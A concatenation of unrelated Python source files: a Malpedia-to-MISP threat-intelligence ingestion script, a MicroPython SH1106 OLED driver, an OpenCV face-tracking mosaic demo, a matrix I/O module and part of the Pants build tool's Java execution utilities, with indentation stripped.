print("f(x) stagePathsAndFiles: DUPLICATING MALWARE FAMILY TAGS TO: {}".format(myName))
if parentType != "FAMILY":
mitre_tags_for_parent = db.copy_tags(iSourceUUID=malwareFamilyUUID, iDestinationUUID=parentUUID)
db.insert_tag(iIsList=True, iList=mitre_tags_for_parent)
if gv._DEBUG:
print("f(x) stagePathsAndFiles: DUPLICATING MALWARE FAMILY TAGS TO: {}".format(parentName))
if isFile == True:
myType = "MALWARE"
myStatus, myVersion, _ = getSpecimenData(iFamilyName, myName[0:64])
if valid_date(myVersion):
myDate = myVersion
else:
myDate = datetime.date.today()
# ADD SPECIMEN AND PATH SPECIFIC TAGS
#TLP
db.insert_tag(myUUID, "", "tlp:amber", "MALWARE")
# VERSION
if myVersion != "":
if gv._DEBUG:
print("f(x) stagePathsAndFiles: INSERT TAG: SPECIMEN AND PATH [IF REQUIRED]: SPECIMEN VERSION: {}".format(myVersion))
db.insert_tag(myUUID, "", myVersion, "VERSION")
# STATUS
if myStatus != "":
if gv._DEBUG:
print("f(x) stagePathsAndFiles: INSERT TAG: SPECIMEN AND PATH [IF REQUIRED]: SPECIMEN STATUS: {}".format(myStatus))
db.insert_tag(myUUID, "", myStatus, "STATUS")
else:
parentUUID = myUUID
parentName = myName
currDirDepth += 1
except Exception as e:
sys.exit(e)
def iterateStageAllFiles():
path_to_malware_json = gv._MALPEDIA_OUTPUT + "malware/"
malwareFamilies = []
for name in glob.glob(path_to_malware_json + "*.json"):
if "completed" not in name:
lstName = name.split("/")
malwareName = lstName[7]
malwareFamilies.append(malwareName.replace(".json", ""))
for oFamily in malwareFamilies:
print("f(x) iterateStageAllFiles: STAGING DATA FOR SPECIMENS OF: {}".format(oFamily))
stagePathsAndFiles(oFamily)
if __name__ == '__main__':
# INITIALIZE GLOBAL VARIABLES
print("f(x) INITIALIZE: INITIALIZE GLOBAL VARIABLES")
if initGlobals() == 1:
print("Critical enviroment variables not set. Normally this is done prior to running \"docker-compose up\" and in the .env file. Please refer to the readme file for proper configuration.")
sys.exit(1)
# UPDATE AND PUSH MISP GALAXIES INTO DATABASE FOR QUICK SEARCHING
print("f(x) INITIALIZE: UPDATE AND PUSH MISP GALAXIES INTO DATABASE FOR QUICK SEARCHING")
mgf.importMISPGalaxies()
# DOWNLOAD UPDATED ACTOR JSON FILES FROM MALPEDIA
print("f(x) INITIALIZE: DOWNLOAD UPDATED ACTOR JSON FILES FROM MALPEDIA")
stageActorMalwareMeta()
# DOWNLOAD UPDATED MALWARE JSON FILES FROM MALPEDIA
print("f(x) INITIALIZE: DOWNLOAD UPDATED MALWARE JSON FILES FROM MALPEDIA")
stageMalwareSpecimens()
# STAGE AN UNATTRIBUTED (CATCHALL) MALWARE ACTOR AND ERROR ACTOR TO CATCH MALPEDIA ATTRIBUTION ERRORS.
print("f(x) INITIALIZE: STAGE AN UNATTRIBUTED (CATCHALL) MALWARE ACTOR AND ERROR ACTOR TO CATCH MALPEDIA ATTRIBUTION ERRORS.")
stageUnattributedActor()
# STAGE KNOWN ACTORS AND FAMILIES
print("f(x) INITIALIZE: STAGE KNOWN ACTORS AND FAMILIES")
stageThreatActors()
# STAGE FAMILIES
print("f(x) INITIALIZE: STAGE FAMILIES")
stageMalwareFamilies()
# FINALLY STAGE MALWARE SPECIMENS TO INCLUDE ADDING PATHS TO THEM IN PARENT CHILD TABLE
print("f(x) INITIALIZE: STAGE MALWARE SPECIMENS TO INCLUDE ADDING PATHS TO THEM IN PARENT CHILD TABLE")
iterateStageAllFiles()
# PUSH ACTORS TO MISP
print ("f(x) INITIALIZE: CREATING MISP ACTOR EVENTS")
actorUUIDs = set()
actorUUIDs = db.get_parent_child_data("actor")
pushNewEventsIntoMisp(actorUUIDs, update=False)
cf.wait(gv._THREAD_LIST)
gv._THREAD_LIST = []
# PUSH FAMILIES TO MISP
print ("f(x) INITIALIZE: CREATING MISP FAMILY EVENTS")
familyUUIDs = set()
familyUUIDs = db.get_parent_child_data("family")
pushNewEventsIntoMisp(familyUUIDs, update=False)
cf.wait(gv._THREAD_LIST)
gv._THREAD_LIST = []
# PUSH PATHS TO MISP
print ("f(x) INITIALIZE: CREATING MISP PATH EVENTS")
pathUUIDs = set()
pathUUIDs = db.get_parent_child_data("path")
pushNewEventsIntoMisp(pathUUIDs, update=False)
cf.wait(gv._THREAD_LIST)
gv._THREAD_LIST = []
# PUSH MALWARE TO MISP
print ("f(x) INITIALIZE: CREATING MISP MALWARE EVENTS")
malwareUUIDs = set()
malwareUUIDs = db.get_parent_child_data("malware")
pushNewEventsIntoMisp(malwareUUIDs, update=False)
cf.wait(gv._THREAD_LIST)
gv._THREAD_LIST = []
# # SANITIZE AND CLEAN DATA
# # EMPTY SSDEEP CORRELATIONS
# print("f(x) INITIALIZE: REMOVING EMPTY SSDEEP CORRELATIONS AND TO IDS FLAGS FROM INVALID CORRELATIONS")
# sf.removeFalsePositiveIDS()
# cf.wait(gv._THREAD_LIST)
# gv._THREAD_LIST = []
# # PUBLISH ALL EVENTS
# print("f(x) INITIALIZE: PUBLISHING ALL UNPUBLISHED")
# sf.publishUnpublished()
# cf.wait(gv._THREAD_LIST)
# gv._THREAD_LIST = []
print("INITIALIZATION COMPLETE")
|
<filename>components/py_engine/framework/sh1106.py
from micropython import const
import utime
import framebuf
from driver import SPI
from driver import GPIO
# a few register definitions
_SET_CONTRAST = const(0x81)
_SET_NORM_INV = const(0xa6)
_SET_DISP = const(0xae)
_SET_SCAN_DIR = const(0xc0)
_SET_SEG_REMAP = const(0xa0)
_LOW_COLUMN_ADDRESS = const(0x00)
_HIGH_COLUMN_ADDRESS = const(0x10)
_SET_PAGE_ADDRESS = const(0xB0)
# register definitions
SET_CONTRAST = const(0x81)
SET_ENTIRE_ON = const(0xa4)
SET_NORM_INV = const(0xa6)
SET_DISP = const(0xae)
SET_MEM_ADDR = const(0x20)
SET_COL_ADDR = const(0x21)
SET_PAGE_ADDR = const(0x22)
SET_DISP_START_LINE = const(0x40)
SET_SEG_REMAP = const(0xa0)
SET_MUX_RATIO = const(0xa8)
SET_COM_OUT_DIR = const(0xc0)
SET_DISP_OFFSET = const(0xd3)
SET_COM_PIN_CFG = const(0xda)
SET_DISP_CLK_DIV = const(0xd5)
SET_PRECHARGE = const(0xd9)
SET_VCOM_DESEL = const(0xdb)
SET_CHARGE_PUMP = const(0x8d)
# dc 同步 led试试
class SH1106:
def __init__(self, width, height, external_vcc):
self.width = width
self.height = height
self.external_vcc = external_vcc
self.pages = self.height // 8
self.buffer = bytearray(self.pages * self.width)
fb = framebuf.FrameBuffer(self.buffer, self.width, self.height, framebuf.MVLSB)
self.framebuf = fb
# set shortcuts for the methods of framebuf
self.fill = fb.fill
self.fill_rect = fb.fill_rect
self.hline = fb.hline
self.vline = fb.vline
self.line = fb.line
self.rect = fb.rect
self.pixel = fb.pixel
self.scroll = fb.scroll
# self.text = fb.text
self.blit = fb.blit
print("init done")
self.init_display()
def init_display(self):
self.reset()
for cmd in (
SET_DISP | 0x00, # 关闭显示
SET_DISP_CLK_DIV, 0x80, # 设置时钟分频因子
SET_MUX_RATIO, self.height - 1, # 设置驱动路数 路数默认0x3F(1/64)
SET_DISP_OFFSET, 0x00, # 设置显示偏移 偏移默认为0
SET_DISP_START_LINE | 0x00, # 设置显示开始行[5:0]
SET_CHARGE_PUMP, 0x14, # 电荷泵设置 bit2,开启/关闭
SET_MEM_ADDR, 0x02, # 设置内存地址模式 [1:0],00,列地址模式;01,行地址模式;10,页地址模式;默认10;
SET_SEG_REMAP | 0x01, # 段重定义设置,bit0:0,0->0;1,0->127;
SET_COM_OUT_DIR | 0x08, # 设置COM扫描方向;bit3:0,普通模式;1,重定义模式 COM[N-1]->COM0;N:驱动路数
SET_COM_PIN_CFG, 0x12, # 设置COM硬件引脚配置 [5:4]配置
SET_PRECHARGE, 0xf1, # 设置预充电周期 [3:0],PHASE 1;[7:4],PHASE 2;
SET_VCOM_DESEL, 0x30, # 设置VCOMH 电压倍率 [6:4] 000,0.65*vcc;001,0.77*vcc;011,0.83*vcc;
SET_CONTRAST, 0xff, # 对比度设置 默认0x7F(范围1~255,越大越亮)
SET_ENTIRE_ON, # 全局显示开启;bit0:1,开启;0,关闭;(白屏/黑屏)
SET_NORM_INV, # 设置显示方式;bit0:1,反相显示;0,正常显示
SET_DISP | 0x01): # 开启显示
self.write_cmd(cmd)
self.fill(1)
self.show()
def poweroff(self):
self.write_cmd(_SET_DISP | 0x00)
def poweron(self):
self.write_cmd(_SET_DISP | 0x01)
def rotate(self, flag, update=True):
if flag:
self.write_cmd(_SET_SEG_REMAP | 0x01) # mirror display vertically
self.write_cmd(_SET_SCAN_DIR | 0x08) # mirror display hor.
else:
self.write_cmd(_SET_SEG_REMAP | 0x00)
self.write_cmd(_SET_SCAN_DIR | 0x00)
if update:
self.show()
def sleep(self, value):
self.write_cmd(_SET_DISP | (not value))
def contrast(self, contrast):
self.write_cmd(_SET_CONTRAST)
self.write_cmd(contrast)
def invert(self, invert):
self.write_cmd(_SET_NORM_INV | (invert & 1))
def show(self):
for page in range(self.height // 8):
self.write_cmd(_SET_PAGE_ADDRESS | page)
self.write_cmd(_LOW_COLUMN_ADDRESS)
self.write_cmd(_HIGH_COLUMN_ADDRESS)
page_buffer = bytearray(self.width)
for i in range(self.width):
page_buffer[i] = self.buffer[self.width * page + i]
self.write_data(page_buffer)
def reset(self, res):
if res is not None:
res.write(1)
utime.sleep_ms(1)
res.write(0)
utime.sleep_ms(20)
res.write(1)
utime.sleep_ms(20)
class SH1106_I2C(SH1106):
def __init__(self, width, height, i2c, res=None, addr=0x3c,
external_vcc=False):
self.i2c = i2c
self.addr = addr
self.res = res
self.temp = bytearray(2)
if res is not None:
res.init(res.OUT, value=1)
super().__init__(width, height, external_vcc)
def write_cmd(self, cmd):
self.temp[0] = 0x80 # Co=1, D/C#=0
self.temp[1] = cmd
self.i2c.writeto(self.addr, self.temp)
def write_data(self, buf):
self.i2c.writeto(self.addr, b'\x40'+buf)
def reset(self):
super().reset(self.res)
class SH1106_SPI(SH1106):
def __init__(self, width, height, spi, dc, res=None, cs=None,
external_vcc=False):
# self.rate = 10 * 1000 * 1000
# dc.init(dc.OUT, value=0)
# if res is not None:
# res.init(res.OUT, value=0)
# if cs is not None:
# cs.init(cs.OUT, value=1)
self.spi = spi
self.dc = dc
# if res is not None:
self.res = res
# if cs is not None:
self.cs = cs
super().__init__(width, height, external_vcc)
def write_cmd(self, cmd):
# self.spi.init(baudrate=self.rate, polarity=0, phase=0)
if self.cs is not None:
self.cs.write(1)
self.dc.write(0)
self.cs.write(0)
self.spi.write(bytearray([cmd]))
self.cs.write(1)
else:
self.dc.write(0)
self.spi.write(bytearray([cmd]))
def write_data(self, buf):
# self.spi.init(baudrate=self.rate, polarity=0, phase=0)
if self.cs is not None:
self.cs.write(1)
self.dc.write(1)
self.cs.write(0)
self.spi.write(buf)
self.cs.write(1)
else:
self.dc.write(1)
self.spi.write(buf)
def reset(self):
super().reset(self.res)
def test(self):
while True:
self.fill(1)
self.show()
self.fill(0)
self.show()
|
#Import the OpenCV and dlib libraries
import cv2
import dlib
#Initialize a face cascade using the frontal face haar cascade provided with
#the OpenCV library
faceCascade = cv2.CascadeClassifier('xmls/haarcascade_frontalface_alt.xml')
#The deisred output width and height
OUTPUT_SIZE_WIDTH = 775
OUTPUT_SIZE_HEIGHT = 600
MOSAIC_RATE = 10
def detectAndTrackLargestFace():
#Open the first webcame device
capture = cv2.VideoCapture(0)
#Create two opencv named windows
cv2.namedWindow("base-image", cv2.WINDOW_AUTOSIZE)
cv2.namedWindow("result-image", cv2.WINDOW_AUTOSIZE)
cv2.namedWindow("mosaic-image", cv2.WINDOW_AUTOSIZE)
#Position the windows next to eachother
cv2.moveWindow("base-image",0,0)
cv2.moveWindow("result-image",400,0)
cv2.moveWindow("mosaic-image",0,400)
#Start the window thread for the two windows we are using
cv2.startWindowThread()
#Create the tracker we will use
tracker = dlib.correlation_tracker()
#The variable we use to keep track of the fact whether we are
#currently using the dlib tracker
trackingFace = 0
#The color of the rectangle we draw around the face
rectangleColor = (0,165,255)
try:
while True:
#Retrieve the latest image from the webcam
rc,fullSizeBaseImage = capture.read()
#Resize the image to 320x240
baseImage = cv2.resize( fullSizeBaseImage, ( 320, 240))
#Check if a key was pressed and if it was Q, then destroy all
#opencv windows and exit the application
if cv2.waitKey(1) & 0xFF == ord('Q') :
quit()
#Result image is the image we will show the user, which is a
#combination of the original image from the webcam and the
#overlayed rectangle for the largest face
resultImage = baseImage.copy()
mosaicImage = baseImage.copy()
#If we are not tracking a face, then try to detect one
if not trackingFace:
#For the face detection, we need to make use of a gray
#colored image so we will convert the baseImage to a
#gray-based image
gray = cv2.cvtColor(baseImage, cv2.COLOR_BGR2GRAY)
#Now use the haar cascade detector to find all faces
#in the image
faces = faceCascade.detectMultiScale(gray, 1.3, 5)
#In the console we can show that only now we are
#using the detector for a face
print("Using the cascade detector to detect face")
#For now, we are only interested in the 'largest'
#face, and we determine this based on the largest
#area of the found rectangle. First initialize the
#required variables to 0
maxArea = 0
x = 0
y = 0
w = 0
h = 0
#Loop over all faces and check if the area for this
#face is the largest so far
#We need to convert it to int here because of the
#requirement of the dlib tracker. If we omit the cast to
#int here, you will get cast errors since the detector
#returns numpy.int32 and the tracker requires an int
for (_x,_y,_w,_h) in faces:
if _w*_h > maxArea:
x = int(_x)
y = int(_y)
w = int(_w)
h = int(_h)
maxArea = w*h
#If one or more faces are found, initialize the tracker
#on the largest face in the picture
if maxArea > 0 :
#Initialize the tracker
tracker.start_track(baseImage,
dlib.rectangle( x-10,
y-20,
x+w+10,
y+h+20))
#Set the indicator variable such that we know the
#tracker is tracking a region in the image
trackingFace = 1
#Check if the tracker is actively tracking a region in the image
if trackingFace:
#Update the tracker and request information about the
#quality of the tracking update
trackingQuality = tracker.update(baseImage)
#If the tracking quality is good enough, determine the
#updated position of the tracked region and draw the
#rectangle
if trackingQuality >= 5.5:
tracked_position = tracker.get_position()
t_x = int(tracked_position.left())
t_y = int(tracked_position.top())
t_w = int(tracked_position.width())
t_h = int(tracked_position.height())
# print("tracked", t_x, t_y, t_w, t_h)
cv2.rectangle(resultImage, (t_x, t_y),
(t_x + t_w , t_y + t_h),
rectangleColor ,2)
m_x = int(t_x > 0 and t_x or 0)
m_y = int(t_y > 0 and t_y or 0)
m_w = int(t_x + t_w < 320 and t_w or 320 - t_x)
m_h = int(t_y + t_h < 240 and t_h or 240 - t_y)
print("MOSAIC", m_x, m_y, m_w, m_h)
# print(int(m_w) * int(m_h))
face_img = mosaicImage[m_y:m_y + m_h, m_x:m_x + m_w]
face_img = cv2.resize(face_img, (m_w//MOSAIC_RATE, m_h//MOSAIC_RATE))
face_img = cv2.resize(face_img, (m_w, m_h), interpolation=cv2.INTER_AREA)
mosaicImage[m_y:m_y + m_h, m_x:m_x + m_w] = face_img
else:
#If the quality of the tracking update is not
#sufficient (e.g. the tracked region moved out of the
#screen) we stop the tracking of the face and in the
#next loop we will find the largest face in the image
#again
trackingFace = 0
#Since we want to show something larger on the screen than the
#original 320x240, we resize the image again
#
#Note that it would also be possible to keep the large version
#of the baseimage and make the result image a copy of this large
#base image and use the scaling factor to draw the rectangle
#at the right coordinates.
largeResult = cv2.resize(resultImage,
(OUTPUT_SIZE_WIDTH,OUTPUT_SIZE_HEIGHT))
mosaicResult = cv2.resize(mosaicImage,
(OUTPUT_SIZE_WIDTH,OUTPUT_SIZE_HEIGHT))
#Finally, we want to show the images on the screen
cv2.imshow("base-image", baseImage)
cv2.imshow("result-image", largeResult)
cv2.imshow("mosaic-image", mosaicResult)
#To ensure we can also deal with the user pressing Ctrl-C in the console
#we have to check for the KeyboardInterrupt exception and destroy
#all opencv windows and exit the application
except KeyboardInterrupt as e:
cv2.destroyAllWindows()
exit(0)
if __name__ == '__main__':
detectAndTrackLargestFace() |
#!/usr/bin/python -Wall
# ================================================================
# <NAME>
# <EMAIL>
# 2005-06-08
#
# Some simple I/O routines for real and complex scalars, vectors,
# and matrices.
# ================================================================
from __future__ import division # 1/2 = 0.5, not 0.
import sys
import copy
import re
# ================================================================
def complex_scalar_from_string(orig_line, lno):
zre = 0
zim = 0
line = copy.copy(orig_line)
# Chomp trailing newline, if any.
if (line[-1] == '\n'):
line = line[0:-1]
# Strip leading and trailing whitespace.
line = re.sub(r"^\s+", r"", line)
line = re.sub(r"\s+$", r"", line)
if (line == ""):
print >> sys.stderr, "pyrcio_m: empty input at line", lno
sys.exit(1)
# Tokenize.
strings = re.split(r"\s+", line)
if (len(strings) == 2):
zre = float(strings[0])
zim = float(strings[1])
elif (len(strings) == 1):
zre = float(strings[0])
else:
print >> sys.stderr, "pyrcio_m: unrecognizable input at line", lno
sys.exit(1)
return zre + zim*1j
# ----------------------------------------------------------------
def real_scalar_from_string(orig_line, lno):
z = 0
line = copy.copy(orig_line)
# Chomp trailing newline, if any.
if (line[-1] == '\n'):
line = line[0:-1]
# Strip leading and trailing whitespace.
line = re.sub(r"^\s+", r"", line)
line = re.sub(r"\s+$", r"", line)
if (line == ""):
print >> sys.stderr, "pyrcio_m: empty input at line", lno
sys.exit(1)
# Tokenize.
strings = re.split(r"\s+", line)
if (len(strings) == 1):
z = float(strings[0])
else:
print >> sys.stderr, "pyrcio_m: unrecognizable input at line", lno
sys.exit(1)
return z
# ================================================================
def read_complex_column_vector(file_name = "-"):
n = 0
v = []
lno = 0
if (file_name == "-"):
file_handle = sys.stdin
else:
try:
file_handle = open(file_name, 'r')
except:
print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
sys.exit(1)
while (1):
line = file_handle.readline()
if (line == ""):
break
lno += 1
v.append(complex_scalar_from_string(line, lno))
n += 1
if (file_name != "-"):
file_handle.close()
if (n == 0):
print >> sys.stderr, "pyrcio_m: Empty input."
sys.exit(1)
return v
# ----------------------------------------------------------------
def read_real_column_vector(file_name = "-"):
n = 0
v = []
lno = 0
if (file_name == "-"):
file_handle = sys.stdin
else:
try:
file_handle = open(file_name, 'r')
except:
print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
sys.exit(1)
while (1):
line = file_handle.readline()
if (line == ""):
break
lno += 1
v.append(real_scalar_from_string(line, lno))
n += 1
if (file_name != "-"):
file_handle.close()
if (n == 0):
print >> sys.stderr, "pyrcio_m: Empty input."
sys.exit(1)
return v
# ----------------------------------------------------------------
def print_complex_column_vector(v):
n = len(v)
for i in range(0, n):
print "%18.11f %18.11f" % (v[i].real, v[i].imag)
# ----------------------------------------------------------------
def print_real_column_vector(v):
n = len(v)
for i in range(0, n):
print "%18.11f" % (v[i])
# ================================================================
def complex_row_vector_from_string(orig_line, lno):
v = []
line = copy.copy(orig_line)
# Chomp trailing newline, if any.
if (line[-1] == '\n'):
line = line[0:-1]
# Strip leading and trailing whitespace.
line = re.sub(r"^\s+", r"", line)
line = re.sub(r"\s+$", r"", line)
if (line == ""):
print >> sys.stderr, "pyrcio_m: empty input at line", lno
sys.exit(1)
# Tokenize.
strings = re.split(r"\s+", line)
if ((len(strings) % 2) == 1):
print >> sys.stderr, "pyrcio_m: odd complex input at line", lno
sys.exit(1)
ncplx = len(strings) / 2
j = 0
for i in range(0, ncplx):
v.append(complex(float(strings[j]), float(strings[j+1])))
j += 2
return v
# ----------------------------------------------------------------
def real_row_vector_from_string(orig_line, lno):
v = []
line = copy.copy(orig_line)
# Chomp trailing newline, if any.
if (line[-1] == '\n'):
line = line[0:-1]
# Strip leading and trailing whitespace.
line = re.sub(r"^\s+", r"", line)
line = re.sub(r"\s+$", r"", line)
if (line == ""):
print >> sys.stderr, "pyrcio_m: empty input at line", lno
sys.exit(1)
# Tokenize.
strings = re.split(r"\s+", line)
j = 0
for i in range(0, len(strings)):
v.append(float(strings[j]))
j += 1
return v
# ================================================================
def validate_matrix(A):
nr = len(A)
min_nc = len(A[0])
max_nc = 0
for i in range(0, nr):
cur_nc = len(A[i])
if (cur_nc < min_nc):
min_nc = cur_nc
if (cur_nc > max_nc):
max_nc = cur_nc
if (min_nc != max_nc):
print >> sys.stderr, "pyrcio_m: ragged matrix."
sys.exit(1)
return max_nc
# ================================================================
def read_complex_matrix(file_name = "-"):
nr = 0
nc = 0
A = []
lno = 0
if (file_name == "-"):
file_handle = sys.stdin
else:
try:
file_handle = open(file_name, 'r')
except:
print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
sys.exit(1)
while (1):
line = file_handle.readline()
if (line == ""):
break
lno += 1
A.append(complex_row_vector_from_string(line, lno))
nr += 1
nc = validate_matrix(A)
if (file_name != "-"):
file_handle.close()
if ((nr == 0) or (nc == 0)):
print >> sys.stderr, "pyrcio_m: Empty input."
sys.exit(1)
return A
# ----------------------------------------------------------------
def read_real_matrix(file_name = "-"):
nr = 0
nc = 0
A = []
lno = 0
if (file_name == "-"):
file_handle = sys.stdin
else:
try:
file_handle = open(file_name, 'r')
except:
print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
sys.exit(1)
while (1):
line = file_handle.readline()
if (line == ""):
break
lno += 1
A.append(real_row_vector_from_string(line, lno))
nr += 1
nc = validate_matrix(A)
if (file_name != "-"):
file_handle.close()
if ((nr == 0) or (nc == 0)):
print >> sys.stderr, "pyrcio_m: Empty input."
sys.exit(1)
validate_matrix(A)
return A
# ----------------------------------------------------------------
def print_complex_matrix(A):
nr = len(A)
nc = len(A[0])
for i in range(0, nr):
for j in range(0, nc):
print "%11.7f %11.7f" % (A[i][j].real, A[i][j].imag),
print
# ----------------------------------------------------------------
def print_real_matrix(A):
nr = len(A)
nc = len(A[0])
for i in range(0, nr):
for j in range(0, nc):
print "%11.7f" % (A[i][j]),
print
|
<reponame>AllClearID/pants
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import urllib
from zipfile import ZIP_STORED
from pants.base.workunit import WorkUnit, WorkUnitLabel
from pants.java.executor import Executor, SubprocessExecutor
from pants.java.jar.manifest import Manifest
from pants.java.nailgun_executor import NailgunExecutor
from pants.util.contextutil import open_zip, temporary_file
from pants.util.dirutil import safe_concurrent_rename, safe_mkdir, safe_mkdtemp
from pants.util.process_handler import ProcessHandler, SubprocessProcessHandler
logger = logging.getLogger(__name__)
def _get_runner(classpath, main, jvm_options, args, executor,
cwd, distribution,
create_synthetic_jar, synthetic_jar_dir):
"""Gets the java runner for execute_java and execute_java_async."""
executor = executor or SubprocessExecutor(distribution)
safe_cp = classpath
if create_synthetic_jar:
safe_cp = safe_classpath(classpath, synthetic_jar_dir)
logger.debug('Bundling classpath {} into {}'.format(':'.join(classpath), safe_cp))
return executor.runner(safe_cp, main, args=args, jvm_options=jvm_options, cwd=cwd)
def execute_java(classpath, main, jvm_options=None, args=None, executor=None,
workunit_factory=None, workunit_name=None, workunit_labels=None,
cwd=None, workunit_log_config=None, distribution=None,
create_synthetic_jar=True, synthetic_jar_dir=None, stdin=None):
"""Executes the java program defined by the classpath and main.
If `workunit_factory` is supplied, does so in the context of a workunit.
:param list classpath: the classpath for the java program
:param string main: the fully qualified class name of the java program's entry point
:param list jvm_options: an optional sequence of options for the underlying jvm
:param list args: an optional sequence of args to pass to the java program
:param executor: an optional java executor to use to launch the program; defaults to a subprocess
spawn of the default java distribution
:param workunit_factory: an optional callable that can produce a workunit context
:param string workunit_name: an optional name for the work unit; defaults to the main
:param list workunit_labels: an optional sequence of labels for the work unit
:param string cwd: optionally set the working directory
:param WorkUnit.LogConfig workunit_log_config: an optional tuple of options affecting reporting
:param bool create_synthetic_jar: whether to create a synthentic jar that includes the original
classpath in its manifest.
:param string synthetic_jar_dir: an optional directory to store the synthetic jar, if `None`
a temporary directory will be provided and cleaned up upon process exit.
:param file stdin: The stdin handle to use: by default None, meaning that stdin will
not be propagated into the process.
Returns the exit code of the java program.
Raises `pants.java.Executor.Error` if there was a problem launching java itself.
"""
runner = _get_runner(classpath, main, jvm_options, args, executor, cwd, distribution,
create_synthetic_jar, synthetic_jar_dir)
workunit_name = workunit_name or main
return execute_runner(runner,
workunit_factory=workunit_factory,
workunit_name=workunit_name,
workunit_labels=workunit_labels,
workunit_log_config=workunit_log_config,
stdin=stdin)
def execute_java_async(classpath, main, jvm_options=None, args=None, executor=None,
workunit_factory=None, workunit_name=None, workunit_labels=None,
cwd=None, workunit_log_config=None, distribution=None,
create_synthetic_jar=True, synthetic_jar_dir=None):
"""This is just like execute_java except that it returns a ProcessHandler rather than a return code.
If `workunit_factory` is supplied, does so in the context of a workunit.
:param list classpath: the classpath for the java program
:param string main: the fully qualified class name of the java program's entry point
:param list jvm_options: an optional sequence of options for the underlying jvm
:param list args: an optional sequence of args to pass to the java program
:param executor: an optional java executor to use to launch the program; defaults to a subprocess
spawn of the default java distribution
:param workunit_factory: an optional callable that can produce a workunit context
:param string workunit_name: an optional name for the work unit; defaults to the main
:param list workunit_labels: an optional sequence of labels for the work unit
:param string cwd: optionally set the working directory
:param WorkUnit.LogConfig workunit_log_config: an optional tuple of options affecting reporting
:param bool create_synthetic_jar: whether to create a synthentic jar that includes the original
classpath in its manifest.
:param string synthetic_jar_dir: an optional directory to store the synthetic jar, if `None`
a temporary directory will be provided and cleaned up upon process exit.
Returns a ProcessHandler to the java program.
Raises `pants.java.Executor.Error` if there was a problem launching java itself.
"""
runner = _get_runner(classpath, main, jvm_options, args, executor, cwd, distribution,
create_synthetic_jar, synthetic_jar_dir)
workunit_name = workunit_name or main
return execute_runner_async(runner,
workunit_factory=workunit_factory,
workunit_name=workunit_name,
workunit_labels=workunit_labels,
workunit_log_config=workunit_log_config)
def execute_runner(runner, workunit_factory=None, workunit_name=None, workunit_labels=None,
workunit_log_config=None, stdin=None):
"""Executes the given java runner.
If `workunit_factory` is supplied, does so in the context of a workunit.
:param runner: the java runner to run
:param workunit_factory: an optional callable that can produce a workunit context
:param string workunit_name: an optional name for the work unit; defaults to the main
:param list workunit_labels: an optional sequence of labels for the work unit
:param WorkUnit.LogConfig workunit_log_config: an optional tuple of task options affecting reporting
:param file stdin: The stdin handle to use: by default None, meaning that stdin will
not be propagated into the process.
Returns the exit code of the java runner.
Raises `pants.java.Executor.Error` if there was a problem launching java itself.
"""
if not isinstance(runner, Executor.Runner):
raise ValueError('The runner argument must be a java Executor.Runner instance, '
'given {} of type {}'.format(runner, type(runner)))
if workunit_factory is None:
return runner.run(stdin=stdin)
else:
workunit_labels = [
WorkUnitLabel.TOOL,
WorkUnitLabel.NAILGUN if isinstance(runner.executor, NailgunExecutor) else WorkUnitLabel.JVM
] + (workunit_labels or [])
with workunit_factory(name=workunit_name, labels=workunit_labels,
cmd=runner.cmd, log_config=workunit_log_config) as workunit:
ret = runner.run(stdout=workunit.output('stdout'),
stderr=workunit.output('stderr'),
stdin=stdin)
workunit.set_outcome(WorkUnit.FAILURE if ret else WorkUnit.SUCCESS)
return ret
def execute_runner_async(runner, workunit_factory=None, workunit_name=None, workunit_labels=None,
workunit_log_config=None):
"""Executes the given java runner asynchronously.
We can't use 'with' here because the workunit_generator's __exit__ function
must be called after the process exits, in the return_code_handler.
The wrapper around process.wait() needs to handle the same exceptions
as the contextmanager does, so we have code duplication.
We're basically faking the 'with' call to deal with asynchronous
results.
If `workunit_factory` is supplied, does so in the context of a workunit.
:param runner: the java runner to run
:param workunit_factory: an optional callable that can produce a workunit context
:param string workunit_name: an optional name for the work unit; defaults to the main
:param list workunit_labels: an optional sequence of labels for the work unit
:param WorkUnit.LogConfig workunit_log_config: an optional tuple of task options affecting reporting
Returns a ProcessHandler to the java process that is spawned.
Raises `pants.java.Executor.Error` if there was a problem launching java itself.
"""
if not isinstance(runner, Executor.Runner):
raise ValueError('The runner argument must be a java Executor.Runner instance, '
'given {} of type {}'.format(runner, type(runner)))
if workunit_factory is None:
return SubprocessProcessHandler(runner.spawn())
else:
workunit_labels = [
WorkUnitLabel.TOOL,
WorkUnitLabel.NAILGUN if isinstance(runner.executor, NailgunExecutor) else WorkUnitLabel.JVM
] + (workunit_labels or [])
workunit_generator = workunit_factory(name=workunit_name, labels=workunit_labels,
cmd=runner.cmd, log_config=workunit_log_config)
workunit = workunit_generator.__enter__()
process = runner.spawn(stdout=workunit.output('stdout'), stderr=workunit.output('stderr'))
class WorkUnitProcessHandler(ProcessHandler):
def wait(_, timeout=None):
try:
ret = process.wait(timeout=timeout)
workunit.set_outcome(WorkUnit.FAILURE if ret else WorkUnit.SUCCESS)
workunit_generator.__exit__(None, None, None)
return ret
except BaseException:
if not workunit_generator.__exit__(*sys.exc_info()):
raise
def kill(_):
return process.kill()
def terminate(_):
return process.terminate()
def poll(_):
return process.poll()
return WorkUnitProcessHandler()
def relativize_classpath(classpath, root_dir, followlinks=True):
"""Convert into classpath relative to a directory.
This is eventually used by a jar file located in this directory as its manifest
attribute Class-Path. See
https://docs.oracle.com/javase/7/docs/technotes/guides/extensions/spec.html#bundled
:param list classpath: Classpath to be relativized.
:param string root_dir: directory to relativize urls in the classpath, does not
have to exist yet.
:param bool followlinks: whether to follow symlinks to calculate relative path.
:returns: Converted classpath of the same size as input classpath.
:rtype: list of strings
"""
def relativize_url(url, root_dir):
# When symlink is involed, root_dir concatenated with the returned relpath may not exist.
# Consider on mac `/var` is a symlink of `/private/var`, the relative path of subdirectories
# under /var to any other directories under `/` computed by os.path.relpath misses one level
# of `..`. Use os.path.realpath to guarantee returned relpath can always be located.
# This is not needed only when path are all relative.
url = os.path.realpath(url) if followlinks else url
root_dir = os.path.realpath(root_dir) if followlinks else root_dir
url_in_bundle = os.path.relpath(url, root_dir)
